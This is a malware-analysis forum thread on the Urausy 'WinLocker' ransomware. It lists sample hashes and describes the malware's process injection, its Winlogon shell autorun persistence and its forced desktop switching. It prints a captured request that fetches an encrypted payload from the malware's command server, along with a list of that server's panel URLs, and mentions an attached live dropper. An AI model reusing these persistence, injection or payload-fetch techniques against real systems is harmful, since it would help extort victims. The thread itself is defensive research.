Win32/Urausy (aka "WinLocker")

Forum for analysis and discussion about malware.
Post Reply
Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Win32/Urausy (aka "WinLocker")

Post by Win32:Virut » Fri Aug 17, 2012 10:27 am

Urausy

https://www.botnets.fr/index.php/Urausy

MD5: B88FD69B53A6E4587D9E95A0C6061141
You do not have the required permissions to view the files attached to this post.

nullptr
Posts: 210
Joined: Sun Mar 14, 2010 6:35 am

Re: Trojan Ransom / FakePoliceAlert

Post by nullptr » Sun Sep 02, 2012 12:44 pm

Urausy

MD5: 74203CB3EE8722B8DE95CC2236C06F3E
vt - https://www.virustotal.com/file/59abd45 ... /analysis/
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Sun Sep 16, 2012 12:09 pm

5x Urausy
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

TrojanDownloader:Win32/Urausy.A

Post by Win32:Virut » Thu Oct 11, 2012 4:21 pm

Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks

User avatar
rkhunter
Posts: 1150
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Contact:

Re: Malware Requests, part 2

Post by rkhunter » Sat Oct 13, 2012 10:32 am

Win32:Virut wrote:Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Sat Nov 17, 2012 3:44 pm

Urausy

Image
Click to enlarge
You do not have the required permissions to view the files attached to this post.

rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: Trojan Ransom / FakePoliceAlert

Post by rinn » Sat Nov 17, 2012 6:09 pm

Hi.

This is interesting ransom. It is written in fasm 1.7 and this make it something special. Usually ransomware are Delphi applications which are written by people with no programming skills. This one is different. It still simple compared to famous trojans, but there are some features which are making it special.

It has three stage startup.

On a first stage it registers window class "SetupFrameClass" creates window called "Setup" and waits few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for second stage and further trojan installation.

Second stage - memory inject in explorer.exe. After this code activates it is creating new special desktop named wLockDesktop, starting zombified copy of svchost.exe with injected (again) trojan code and initial process desktop value set to be wLockDesktop. Then execution transfers to this zombified svchost.exe


Third stage is responsible for setting autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- it is ransom itself (copy file routine also take place in this stage).

Ransom (code running inside svchost.exe) ensures that wLockDesktop is current active desktop by doing periodical switching to it. This was made to defeat sysinternals desktops and similar tools.

Decrypted and working dropper in attach. Password "infected" without quotes.

Best Regards,
-rin
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4775
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by EP_X0FF » Sun Nov 18, 2012 7:00 am

Switching to different desktop set in the infinite loop with a very small delay.

Code: Select all

00000039	273.98556519	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000040	274.08596802	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000041	274.18600464	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000042	274.28622437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000043	274.38613892	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000044	274.48648071	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000045	274.59146118	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000046	274.68685913	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000047	274.78668213	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000048	274.90359497	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000049	275.01293945	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000050	275.10397339	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000051	275.20385742	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000052	275.32345581	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000053	275.43780518	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000054	275.52349854	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000055	275.62338257	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000056	275.72372437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
Winlock window hierarhy (diffent run, that why different PID).

Image

Used embedded IE window to display HTML based content.

Payload requested in encrypted container, special marker appended to the beginning of request string - "55565755".
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722
Decrypts into %temp% folder and then executes by ransom from embedded full screen IE window. Ransom page + all graphics/css in attach.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

User avatar
Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by Xylitol » Sun Nov 18, 2012 10:43 am

EP_X0FF wrote:Host: hhrbn.ru
Not at home the weekend so can't attack/dissas stuff but found this

Code: Select all

rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/
mysql.php return "could not find driver" rest are standard HTTP 200/Length 0, probably need parameters.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan:Win32/Urausy (aka "WinLocker")

Post by Win32:Virut » Sun Nov 18, 2012 11:59 am

New Urausy
You do not have the required permissions to view the files attached to this post.

Post Reply